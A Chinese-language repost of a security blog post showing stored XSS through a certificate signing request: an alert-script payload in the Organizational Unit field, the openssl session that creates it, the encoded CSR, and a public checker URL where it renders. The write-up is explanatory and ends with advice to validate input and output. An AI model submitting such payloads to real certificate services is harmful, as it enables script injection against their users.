SSL / TLS certificates XSS

web应用程序开发人员都知道,永远不要相信Web应用程序用户的输入。但是如果你不知道他们提交什么呢?

在调查应用程序中的某些表单字段时,我遇到了一个表单,用于检查您需要订购SSL / TLS证书的证书签名请求(CSR)。

证书签名请求是一个编码文件,其中包含向证书颁发机构(CA)或该CA的代理商申请证书的信息。您将需要自己创建该文件,并输入所需的信息。

所以,你也可以像这样把东西放进去:

alert('attacked')</ script>

如果经销商的证书CA将CSR的信息保存到SQL数据库中供以后使用,则可以执行SQL注入。

所以,让我给你看一些例子。

这是我在所有情况下使用的CSR:

-----BEGIN CERTIFICATE REQUEST-----
MIICzjCCAbYCAQAwgYgxCzAJBgNVBAYTAk5MMRAwDgYDVQQIDAdVdHJlY2h0MRAw
DgYDVQQHDAdVdHJlY2h0MRIwEAYDVQQKDAlOdzRhbGwgQlYxKzApBgNVBAsMIjxz
Y3JpcHQ+YWxlcnQoJ2F0dGFja2VkJyk8L3NjcmlwdD4xFDASBgNVBAMMC3d3dy5v
Y3NyLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3UpBMvJ8Cc1N
FoTI083bzoXhVXaPxN4M/gqWZYSs7RCfkYyAwabLzw9zQeybUa1SXmvAcQjvfsYe
LJvZpHlY6XIbgaS8JXu5WCkYS6nTN5TDwzghNfCHRA65s47uEuVrXq6P5/Xm9ETp
v9yLTBzAL7sci/6oGq/7qKHfuypG08TRhj/GRraA67ZuDbw6u8uMB2YzTbkgxsDM
YUgamCLeLq39wLQNE4a+fWaxbp2XME30hRXONGI/yYDjavwNl6fXJ1A4fMktzzJd
bsQRVRAyEu04Aw48d8NAN1EDkUBBTneRRWMXWO9bfHSPLK+9E/6ntJu63P8I4llk
IR+hFU0uaQIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAA3QbR9+mxgR9socp21l
WWAQCA5D+JWs8yO3QfXZA4+3IAlqQtKEyz8j0Mncra7yI9QGasnTlnbOPIASb3WY
No/5GlWxzoMivSRHSBUHhg+gly1ZcpPsgKf37aYNFxOX40Fwr3rUSRPDiqx35eQ0
ECY/1GiPyOqH3t6ck41A1Y+d4WCHHI6g6QJp1ZGS98aDRxel4yaJRGqJf1NKMrqE
OScbogqLjD9XnrnTK1dUGUPKx0hpJ5EyYmSmweAxmE6AfffVw/+8QUbnMxyD0j8j
sUy/bACF0UCwBntRzZ17aZ8WHRq3zKeA3y3s/zU7JKS4ZJjP2rD3dGAIeSPN/nHv
9tI=
-----END CERTIFICATE REQUEST-----

你可以在这里查看它的内容:

https://cryptoreport.websecurity.symantec.com/checker/views/csrCheck.jsp

我是如何进行证书签名请求的?简单,像所有其他:

sebastian@blade:~$ openssl req -utf8 -nodes -sha256 -newkey rsa:2048 -keyout private2.key -out cert2.csr
Generating a 2048 bit RSA private key
............................+++
.+++
writing new private key to 'private2.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:NL
State or Province Name (full name) [Some-State]:Utrecht
Locality Name (eg, city) []:Utrecht
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Nw4all BV
Organizational Unit Name (eg, section) []:< script > alert('attacked') < /script >
Common Name (e.g. server FQDN or YOUR name) []:www.ocsr.nl
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

sebastian@blade:~$

所以,不仅要检查你的输入,还要检查屏幕上显示的结果。

转载请注明出处:https://www.freearoot.com/index.php/ssl-tls-certificates-xss.html

转载文章来源:https://binaryfigments.com/2017/09/28/xss-in-a-certificate-signing-request/

Tags: